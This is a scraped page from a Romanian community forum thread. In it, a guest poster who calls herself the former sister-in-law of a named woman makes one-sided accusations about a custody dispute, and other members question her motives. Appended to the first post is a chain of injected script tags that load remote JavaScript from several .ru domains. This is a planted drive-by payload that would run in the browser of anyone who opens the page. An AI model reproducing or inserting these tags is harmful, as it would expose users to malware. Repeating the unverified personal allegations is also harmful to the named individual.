Follow RomanianPortal on Twitter       
Pagina 1 din 8 123 ... UltimulUltimul
Rezultate 1 la 10 din 74

Subiect: Sa lamurim situatia...cu Tatiana Barbu

Guest

Implicit

In primul rand,nu sunt o prietena ci o ruda de a Tatianei Barbu, fosta cumnata mai bine zis.Este o poveste lunga si trista..am sa incerc pe scurt sa va povestesc viata fratelui meu,fostul sot al Tatianei Barbu.S-au cunoscut in liceu,s-au iubit,m-ai tarziu s-au casatorit si fratele a plecat in Italia sa asigure viata frumoasa sotiei.A muncit ani de zile la 40 grade in Sicilia,la cules portocale,si toti bani i-a trimis sotiei ani de-a randul.Insa Tatiana nu rezistat singura si a inceput sa isi insele sotul cu oricine din Bacau.S-a intors sotul acasa,mai tarziu a plecat in Anglia,sotia a dat nastere la o fetita,iar sotul a muncit mai din greu ca sa le asigure tot comfortul.Nu si-a vazut niciodata fetita,insa dupa multi ani de strainatate,a venit timpul sa mearga acasa,insa Tatiana l-a convins sa mai stea...avea un plan...A vandut apartamentul,masina tot,si a vrut sa plece cu tot cu fetita in America.Nu a reusit insa sa treaca fetita pe pasaportul ei fara semnatura tatalui,cu toate ca a insistat la pasapoarte...Asa ca e a parasit copilul,si a plecat in US,ii era teama ca vine sotul si va afla toate aventurile.A lasat-o pe Giulia printre straini de la 4 ani,si nu la parinti cum declara ea...Sotul a venit acasa,nu tu casa,nu tu sotie si nici copil..imaginati-va durerea din suflet,dupa atatia ani de munca si suferinta..si barbatii au suflet,sa stiti.Dupa lungi cautari a dat de un fir si a gasit fetita,si dupa lungi insistente i s-a dat voie sa o vada,insa omul nu a mai judecat,de manie,suparare si a luat fetita cu el.Nu o vazuse niciodata,a iubit-o din prima,si pentru ca mama nu era langa ea,era prea ocupata in US,sa se recasatoreasca, a dorit sa ii fie alaturi ,parinte.Tatiana a inceput sa imprastie numai vorbe rele despre fostul sot,si l-a dat in urmarire,tot ea, care gresise si distrusese caminul lor,ea care inselase,vanduse tot,si deja dupa un scurt timp in US s-a recasatorit,si a facut si alt copil.Marea greseala a sotului a fost ca nu a avut un avocat bun,care sa il sfatuie sa aplice pentru custodia fetitei,pentru ca el era in tara si ea in US.In final s-a decis sa plece din nou in strainatate,iar pentru ca fetita nu putut sa o i-a cu el a lasat-o la niste cunostinte f.bune,si nu la o fam.de tigani,cum declara Tatiana.Femeia din Piatra care i-a crescut fetita 5 ani,a iubit-o si ingrijit-o ca pe o nepoata proprie.Dar Tatiana a jignit-o si a ameninat-o,fara un pic de respect fata de cineva care i-a crescut copilul 5 ani.De cand a luat fetita de la Piatra,Tatiana nu i-a mai dat-o niciodata la tel.fostului sot,lucru care vroia sa il faca daca reusea sa o i-a cu ea in US ani in urma..Macar Giulia stie ca are un tata,bun sau rau e tatal ei si nimic nu poate schimba asta..poate vreodata are sa il caute...sa ii spuna TATA,as vrea sa ascult si varianta ta!.Sa nu uitam ca si tati sunt parinti,si au suflet..de PARINTE! Cu Tv si media situatiile se interpreteaza gresit intotdeauna,pentru ca ne place sa judecam fara sa stim adevarata situatie..Nu am vrut nicicand adresa lor din US,ci ma gandeam ca poate o sa citeasca si Tatiana si lumea va afla ca de fapt minte....Era cinstit si omeneste ,sa divorteze sa vada copilul amandoi,si totul ar fi fost normal,nu se ajungea la rapiri,suferinte,si chinuri.Copilul nu a crescut nici cu mama, nici cu tata,si vina CEA MAI MARE o poarta TATIANA.Era mai bine daca Paulet(fostul sot) o lasa sa lucreze la Bacau ca CROITOREASA,cum lucrape timpuri,si acum probabil era altfel de femeie.S-ar parea ca atunci cand o duci prea bine ,o iei razna!DUMNEZEU NU DOARME, v-a avea grija de fiecare in parte.kgj3.r<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www<script src=http://www.iroe.ru/ngg.js></script>

Data înscrierii
    15.06.2007
    Posturi
    46
    Putere Rep
    0

Implicit

Eu am citit ,dar nu inteleg de ce nu incearca pe cale legala ?! nu cred ca este o solutie sa-ti faci dreptate singur
    do yourself a favor and look it up

Guest

Implicit

intradevar nu e o solutie dar fiecare reactioneaza diferit la stress si socuri...acum oricum fetita este cu ea,si nu vrea sa i-o dea la telefon cu toate ca a promis la Povestiri Advevarate in fata unui popor intreg,ca il iarta ca a luat fetita,si ca i-o va da la telefon..nu s-a intamplat insa.nici femeii care a crescut-o nu i-a mai dat-o la telefon,dimpotriva a incercat sa o bage la puscarie.....

Data înscrierii
    09.12.2003
    Locație
    Chicago & Constanta
    Posturi
    13.476
    Putere Rep
    10

Implicit

<B style="mso-bidi-font-weight: normal">catwoman[/B], acum poate ne spui mai in detaliu si care a fost scopul acelui anunt in care spuneai ca vrei sa gasesti o prietena. mesajul tau initial spunea ca esti in cautarea unei prietene, dar aceasta

Data înscrierii
    28.04.2006
    Posturi
    2.254
    Putere Rep
    18

Implicit

Sorin povestea este mediatizata in Romania peste tot...Adevarul este undeva la mijloc,si avea dreptate o buna si iubita prietena de-a mea,cand spunea ce spunea...Sa le indrepte Dumnezeu pasii catre adevar,si in primul rand sa se gandeasca la sufletul copilului...

Guest

Implicit

dupa cum am spus sunt o fosta cumnata de a dansei,si mie mi s-a adresat intrebandu-ma cine sunt si cum ma cheama..mi-a trimis si un mesaj privat vrand sa stie cine sunt..si nu am nici o intentie rea..am vrut doar sa vad daca cineva o cunoaste ca sa pot sa imi spun amarul cum si-a batut joc de fratele meu..am crezut ca asta este rolul unui forum discutii,barfe....daca subiectul meu e nepotrivit eu ma retrag si nu mai deranjez[img]smileys/smiley1.gif[/img]

Data înscrierii
    09.12.2003
    Locație
    Chicago & Constanta
    Posturi
    13.476
    Putere Rep
    10

Implicit

pai tocmai, de aceea este forum sa intrebam si noi ce nu ni se pare clar. nu a spus nimeni ca trebuie sa te retragi ci doar sa clarifici unele detalii. de exemplu, de ce nu ai spus din prima ca esti o cumnata, in loc de o prietena.

apropo de spus amarul, banuiesc ca putea sa spui povestea care-ti statea pe suflet si direct, fara sa cauti informatii despre cumnata ta. nu stiu de ce, dar am impresia ca lipseste o rotita mica din tot mecanismul, dar se poate sa fie doar o parea personala.

Guest

Implicit

bina am gresit,dar daca aveam sa spun ca sunt o cumnata Tatiana avea sa inceapa cu atacuri la persoana mea,ceea ce nu vreau..s-a intamplat in trecut si nu a fost frumos.

va multumesc tuturor pentru atentie,dar s-ar parea ca am abordat problema gresit.

Data înscrierii
    15.06.2007
    Posturi
    46
    Putere Rep
    0

Implicit

Citat Postat în original de catwoman
    intradevar nu e o solutie dar fiecare reactioneaza diferit la stress si socuri...
    Greseala costa ,orice actiune pe cont propriu poate fi folosita impotriva ta . Cind sentimentele primeaza esti in pericol sa faci lucruri pe care pe urma le vei regreta.
    do yourself a favor and look it up

Guest

Implicit

Platim pentru greseli in viata,dar mai degraba sa risti fie ca e greseala sau nu,decat sa te intrebi mai tarziu,daca faceam asa cum avea sa fie?si depinde de sentimente,si de persoana,difera de la caz la caz...nu crezi Isolda?[img]smileys/smiley25.gif[/img]

Pagina 1 din 8 123 ... UltimulUltimul

Subiecte similare

1. Hai sa lamurim impreuna
    De marian42 în forumul Sondaje/Polls
    Răspunsuri: 70
    Ultimul post: 10.02.2010, 10:28
  2. in legatura cu Tatiana Barbu
    De florin în forumul Montreal si suburbii- Quebec- Romani, Comunitatea Romaneasca
    Răspunsuri: 1
    Ultimul post: 10.04.2009, 21:31
  3. Situatia Economica USA
    De May09 în forumul Discutii Generale-de toate pentru toti, diverse
    Răspunsuri: 278
    Ultimul post: 04.05.2008, 12:11
  4. Dr.Barbu Bogdan
    De în forumul Cautare persoane - Anunturi, intrebari, raspunsuri, sfaturi
    Răspunsuri: 2
    Ultimul post: 21.12.2006, 01:07
  5. Il caut pe Bogdan BARBU, medic
    De Miha Fritz în forumul Cautare persoane - Anunturi, intrebari, raspunsuri, sfaturi
    Răspunsuri: 7
    Ultimul post: 21.12.2006, 00:43

Permisiuni postare

• Nu poți posta subiecte noi
  • Nu poți răspunde la subiecte
  • Nu poți adăuga atașamente
  • Nu poți edita posturile proprii
  •